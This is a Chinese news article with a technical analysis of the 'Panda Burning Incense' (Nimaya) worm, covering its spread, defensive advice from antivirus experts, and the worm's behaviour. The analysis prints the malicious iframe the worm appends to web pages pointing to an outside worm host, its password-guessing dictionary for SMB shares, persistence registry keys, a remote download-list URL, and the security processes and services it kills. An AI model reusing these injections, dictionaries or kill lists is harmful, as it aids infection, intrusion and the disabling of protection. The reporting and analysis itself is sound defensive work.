揭秘“熊猫烧香”肆虐内幕 已有千余家企业网络遭攻击

　　DoNews北京1月12日消息（记者刘韧）瑞星全球反病毒监测网向企业局域网发布警告，目前“尼姆亚（也称熊猫烧香）”病毒的攻击重点正在转向企业局域网和网站，广大企业和网站应提高警惕紧密防范。瑞星反病毒专家介绍说，该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染，上传网页到网站后，就会导致用户浏览这些网站时也被病毒感染。

　　据悉，目前多家著名网站已经遭到此类攻击，而相继被植入病毒。由于这些网站的浏览量非常大，致使此次“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。

　　瑞星反病毒专家介绍说，“熊猫烧香”其实是“尼姆亚”病毒的新变种，最早出现在2006年的11月，到目前为止已经有数十个不同变种，在此期间瑞星已经发布针对该病毒的专杀工具，今天该工具已经升级，用户可以去瑞星网站（http://it.rising.com.cn/Channels/Service/index.shtml）免费下载使用。

　　除了通过网站带毒感染用户之外，此病毒还会在局域网中传播，在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

　　那么，用户应该如何防范“熊猫烧香”病毒的攻击？

　　专家建议，第一，安装杀毒软件和瑞星卡卡3.1，并在上网时打开网页实时监控。由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件免费为用户提供一个月服务，可以登陆：http://www.rising.com.cn 免费下载并使用。用户还可以通过瑞星在线专家门诊：http://help.rising.com.cn取得帮助。

　　第二，网站管理员应该更改机器密码，以防止病毒通过局域网传播。

　　第三，QQ、UC的漏洞已经被该病毒利用，用户应该去他们的官方网站打好最新补丁。

　　第四，该病毒会利用IE浏览器的漏洞进行攻击，因此用户应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。

　　这是一个传染型的DownLoad 使用Delphi编写

　　该病毒的主要行为:
　　一.传播
　　1.本地磁盘感染
　　病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行
　　文件遍历感染注:不感染文件大小超过10485760字节以
　　上的.
　　(病毒将不感染如下目录的文件):
　　Microsoft Frontpage
　　Movie Maker
　　MSN Gamin Zone
　　Common Files
　　Windows NT
　　Recycled
　　System Volume Information
　　Documents and Settings
　　....
　　(病毒将不感染文件名如下的文件):
　　setup.exe
　　NTDETECT.COM

　　病毒将使用两类感染方式应对不同后缀的文件名进行感染
　　1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)
　　将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.

　　2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)
　　在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
　　<iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
　　在感染时会删除这些磁盘上的后缀名为.GHO

　　2.生成autorun.inf
　　病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成
　　setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联
　　使病毒在用户点击被感染磁盘时能被自动运行.

　　3.局域网传播
　　病毒生成随机个局域网传播线程实现如下的传播方式:
　　当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典
　　进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务
　　启动激活病毒.
　　被尝试猜测密码的账户号为:
　　 Administrator
　　 Guest
　　 admin
　　 Root

　　用来进行密码尝试的字典为:
　　1234
　　password
　　6969
　　harley
　　123456
　　golf
　　pussy
　　mustang
　　1111
　　shadow
　　1313
　　fish
　　5150
　　7777
　　qwerty
　　baseball
　　2112
　　letmein
　　mein
　　12345678
　　12345
　　admin
　　5201314
　　qq520
　　1234567
　　123456789
　　654321
　　54321
　　000000
　　11111111
　　88888888
　　pass
　　passwd
　　database
　　abcd
　　abc123
　　sybase
　　123qwe
　　server
　　computer
　　super
　　123asd
　　ihavenopass
　　godblessyou
　　enable
　　2002
　　2003
　　2600
　　alpha
　　111111
　　121212
　　123123
　　1234qwer
　　123abc
　　patrick
　　administrator
　　ator
　　root
　　fuckyou
　　fuck
　　test
　　test123
　　temp
　　temp123
　　asdf
　　qwer
　　yxcv
　　zxcv
　　home
　　owner
　　login
　　Login
　　pw123
　　love
　　mypc
　　mypc123
　　admin123
　　mypass
　　mypass123
　　901100

　　二.修改操作系统的启动关联
　　病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以
　　1秒钟为周期不断设置如下键值:
　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
　　svcshare=%病毒文件路径%

　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
      CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
　　CheckedValue=0

　　三.下载文件启动
　　病毒会以20分钟为周期尝试读取特定网站上的下载文件列表
　　如:http://wangma.9966.org/down.txt
　　并根据文件列表指定的文件下载,并启动这些程序.

　　四.与杀毒软件对抗
　　1.关闭包含以下字符串的窗口：
　　防火墙
　　VirusScan
　　NOD32
　　网镖
　　杀毒
　　毒霸
　　瑞星
　　超级兔子
　　优化大师
　　大师
　　木马清道夫
　　木馬清道夫
　　卡巴斯基反病毒
　　Symantec AntiVirus
　　Duba
　　esteem procs
　　绿鹰PC
　　密码防盗
　　噬菌体
　　木马辅助查找器
　　System Safety Monitor
　　Wrapped gift Killer
　　Winsock Expert
　　游戏木马检测大师
　　超级巡警
　　IceSword

　　2.结束以下进程：
　　Mcshield.exe
　　VsTskMgr.exe
　　naPrdMgr.exe
　　UpdaterUI.exe
　　TBMon.exe
　　scan32.exe
　　Ravmond.exe
　　CCenter.exe
　　RavTask.exe
　　Rav.exe
　　Ravmon.exe
　　RavmonD.exe
　　RavStub.exe
　　KVXP.kxp
　　KvMonXP.kxp
　　KVCenter.kxp
　　KVSrvXP.exe
　　KRegEx.exe
　　UIHost.exe
　　TrojDie.kxp
　　FrogAgent.exe
　　Logo1_.exe
　　Logo_1.exe
　　Rundl132.exe
　　regedit.exe
　　msconfig.exe
　　taskmgr.exe

　　3.关闭并删除以下服务：
　　Schedule
　　sharedaccess
　　RsCCenter
　　RsRavMon
　　RsCCenter
　　KVWSC
　　KVSrvXP
　　kavsvc
　　AVP
　　McAfeeFramework
　　McShield
　　McTaskManager
　　navapsvc
　　wscsvc
　　KPfwSvc
　　SNDSrvc
　　ccProxy
　　ccEvtMgr
　　ccSetMgr
　　SPBBCSvc
　　Symantec Core LC
　　NPFMntor
　　MskService
　　FireSvc

　　注:
　　因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有利用安全漏洞进行
　　病毒传播的链接.如果一台服务器被感染将大大增加病毒传播的范围.